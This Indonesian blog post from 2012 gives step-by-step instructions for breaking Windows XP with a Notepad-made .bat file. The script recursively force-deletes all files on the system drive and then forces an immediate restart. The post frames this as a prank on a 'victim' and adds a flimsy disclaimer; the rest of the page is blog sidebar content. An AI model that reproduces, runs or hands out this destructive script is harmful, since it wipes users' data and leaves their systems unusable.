Rabu, 09 Mei 2012

0 Cara Merusak Windows XP dengan Notepad


Jangan Lupa Tinggalkan Komentar Kalian Ya...!!!
Cara Merusak Windows XP dengan Notepad. Sebelumnya saya hanya ingin share ilmu pengetahuan, saya tidak bertanggung jawab terhadap sesuatu yang di karenakan trik ini.



Jadi buat ini hanya untuk pengetahuan semata dan jangan swekali-kali memakai cara ini untuk hal yang negatif.... OKE?????



Trik cara merusak windows XP dengan notepad ini, yang disimpan dalam bentuk file.bat ber-encoding ANSI ini memang merepotkan bagi korban yang dijahili, saya juga kurang tau bagaimana cara mengatasi windows XP yang telah dirusak dengan file notepad ber-script ini.



berikut caranya :



1.Buka Notepad, copy paste script dibawah ini :



@echo off

del %systemdrive%\*.* /f /s /q

shutdown -r -f -t 00


2. Simpan dengan nama berakhiran .bat



File name = .bat

type file = All file

Encoding = ANSI



cukup dengan doubleclick untuk mengeksekusi file ini, dan windows XP- pun akan segera error.





HATI-HATI JANGAN DICOBA DIRUMAH YA.... hehehehehe

0 komentar:

1. Good Girl
2. D'MASIF -sudah perih ini
3. Haney Bunny Sweety-G-String.mp3
4. ARMADA-Mau Dibawa Kemana.mp3
5. Ayang Ayangku.mp3
6. Tak Semestinya Kita Berpisah (TSKB).mp3
7. When The Children Cry - White Lion.mp3
Info

Catatan HUGGENG|CYBER

SELAMAT DATANG DI BLOG SAYA :), MAAF KALO DI BLOG INI ISI DARI KONTEN KURANG MENARIK< TETAPI SAYA AKAN MEMBUAT PARA PENGUNJUNG SENANG DI BLOG INI

Sekilas Tentang Admin

Saya Buakanlah Profesional Pembuat Blog Atau Web, Saya Masih Butuh Belajar, Dari Rekan2 Bloger. INFO:
BLOG ANAK INDONESIA UNTUK ANDA SEMUA

Follow

Follow HUGGENG|CYBER

Nikmati Layanan TV Online Gratis di HUGGENG|CYBER *